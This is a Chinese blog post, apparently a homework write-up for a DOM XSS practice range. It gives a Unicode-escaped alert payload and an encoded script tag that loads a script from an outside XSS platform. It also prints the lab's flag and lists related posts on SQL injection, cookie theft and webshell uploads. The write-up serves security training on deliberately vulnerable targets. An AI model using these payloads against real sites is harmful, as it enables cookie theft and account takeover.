封神台DOM XSS靶场

最新推荐文章于 2024-08-05 22:58:41 发布
最新推荐文章于 2024-08-05 22:58:41 发布
阅读量1k 收藏
点赞数 1
分类专栏: Web安全微专业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40941912/article/details/108927759
版权
本文介绍了DOM型跨站脚本(DOM XSS)的攻击实例,通过在页面输入框中使用Native编码触发JavaScript执行,展示了payload如何在URL中成功执行并弹窗。进一步,利用编码后的payload从xss平台构造攻击,最终根据靶场提示获取flag。文章揭示了DOM XSS的安全风险及防范措施。
摘要由CSDN通过智能技术生成

作业

DOM XSS靶场 (Rank: 10)

  1. 在页面上可填写的地方都输入 Native编码:
    \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
    插入到url中,发现弹窗了:

    此处的payload被当作代码执行了

  2. 把xss平台构造好的payload编码后插入进去:
    \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0078\u0073\u0073\u0070\u0074\u002e\u0063\u006f\u006d\u002f\u0074\u0053\u0077\u0074\u0066\u006d\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e

  3. 按照靶场提示的步骤拿到flag{zkz{x3ser-D0m}},提交正确

炎凰先生
关注
专栏目录
神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1593
神台靶场 | 布尔盲注 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名字长度 2.数据库库名 3.
神台反射型XSS靶场
qq_40941912的博客
10-05 678
作业 反射型XSS靶场 (Rank: 5) 靶场上面是一个输入框,输入查看是否存在xss漏洞: 发现并没有任何反应 查看源码后发现,两个尖括号被替换成html里面用字符表示出来的尖括号: 尖括号被过滤了,然后尝试在输入框内闭合引号,添加onfocus事件: 点击输入框: 触发了onfocus事件,拿到flag{zkaq-xssgood-Q0OA} 提交flag,成功 ...
神台靶场练习
最新发布
token_x的博客
08-05 366
神台靶场练习,未完待补充
DOMxss靶场实验
qq_64302290的博客
06-08 1250
DOMxss可以使用js去控制标签中的内容。
神台靶场
m0_71518346的博客
10-18 734
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
domxss靶场注入
weixin_45540609的博客
04-25 337
我们点开靶场的源码发现有关键函数document.write() 我们尝试在url里输入,发现这里可以控制传参 我们输入事件型,发现被waf拦截了 换一种方式,使用<iframe onload=alert(/xss/),发现弹窗,说明存在xss漏洞,但是只是一个反射型xss。 我们在xsspt上找到一个xss代码,输入代码,发现被waf拦截,这里可以使用navie编码再尝试。(因为document.write支持)在如下网址转化 <sCrIpt srC=//xs..
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSSDOMXSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
信息安全技术(二)——利用DOM XSS
Wine_in_glass的博客
06-27 443
这一实验主要根据实验指导书完成了对于XSS的基本操作,其中反射型XSS最为简单。而存储型XSS和基于DOMXSS的效果更好,危害也更大。反射型XSS,相对来说,危害较低,需要用户点击特定的链接才能触发。存储型XSS,会把攻击代码保存到数据库,所以也叫持久型XSS,因为它存在的时间是比较长的。DOMXSS,这类XSS主要通过修改页面的DOM节点形成XSS,称为DOM Based XSS不需要服务器。
xss实战,xss靶场通关详解
maluxiao123的博客
04-02 2076
第一关:我们发现页面上没有任何可以输入的地方 但是发现url中有参数传递为test,而页面上也显示了test,所以说,传入的参数可以显示到页面上。 使用f12控制台查看原代码 我们传入<script></script> 这里可以发现,原本来的test不见了,按理来说应该会出现欢迎用户<script></script>才对,但是没有,到哪里去了,没错,他被浏览器解析了,在这个标签中就可以插入你想执行的js代码 我们由于靶场需要弹窗才能进入下一关,所以传入&
Static-DOM-XSS-Scanner:静态DOM XSS扫描仪是一种用python编写的静态分析工具,它将遍历给定目录下的所有JavaScript和HTML文件,并列出所有可能导致DOM XSS的来源和接收器。 扫描结束时,该工具将生成一个HTML报告-python source file
03-25
静态DOM-XSS-Scanner 静态DOM XSS扫描仪是一种用python编写的静态分析工具,它将遍历给定目录下的所有JavaScript和HTML文件,并列出所有可能导致DOM XSS的来源和接收器。 扫描结束时,该工具将生成一个HTML报告。
神台存储型Xss靶场
qq_40941912的博客
10-05 660
作业 存储型Xss靶场 (Rank: 10) 靶场上面是个finecms,然后在网上搜索了一下它所存在的漏洞,发现在404界面会将地址栏的get传参输入到日志里面,存储到数据库,将参数值替换成我们构造好的payload,当管理员产看日志的时候会触发payload,存在一个存储型xss 于是找到传参点: 在xss平台建立一个项目,得到构造好的payload: 当作m的参数传进去: 拿到cookie: 成功拿到flag{zKaQ-01sdfDCo0} 提交flag,成功
神台靶场-第六章
Mr_helloword的博客
07-11 1354
第六章-SYSTEM!POWER! Tips: 1、提权! 2、FLAG在C盘根目录下! 1.在第五章的基础上用菜刀连接,根据提示查看flag,发现没有权限,这里想到提权,这是本章重点( 注:如果中途出现掉线,重新连接菜刀,或重新上传木马连接) 2.上传cmd.exe,iis6.exe文件(在upfile这里上传这俩个文件) 3.打开cmd命令,想法:创建管理员组新用户成员,奈何权限低。 whoami查看当前用户:发现为web应用服务组成员,权限低 我们想到还有一个iis6,我们查看该用户发现为syst
mbp 神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 2595
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
神台靶场 | 显错注入 | Pass01-04
Fanny0602的博客
03-05 959
神台靶场 | 显错注入 题目地址: 掌控安全学院SQL注入靶场 显错注入 Pass01 Pass02 Pass03 Pass04 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass01 数据库查询语句: select *from user where id=1 Pass02 数据库查询语句: select *from user where id=‘1’ Pass03 数据库查询语句: select *from user where id=(‘1’) Pass04 数据库查询语
神台sql注入的靶场,为了小芳,开冲
Wubuqing的博客
10-27 259
先判断是否存在注入 1=1 返回正常 1=2 返回错误 所以存在SQL注入 使用order by 查询该数据表的字段数量 Order by 2 返回正常 order by 3返回错误 所以字段数量是2 判断回显的位置 Union select 1,2 在 2回显 然后查询数据库名 union select 1,database() 得到数据库名为 maoshe 查询路径 union select 1,@@datadir 还有查询数据库版本 Union select 1,version() 然后查询表名
神台靶场-第五章
Mr_helloword的博客
07-11 1914
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
pikachu靶场domxss
08-16
Pikachu靶场是一个用于漏洞测试的平台,而DOM型的XSS(跨站脚本攻击)是一种利用网页中的DOM(文档对象模型)进行攻击的方式。在DOMXSS攻击中,攻击者通过注入恶意脚本来篡改网页的行为,使其执行攻击者预期的操作...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值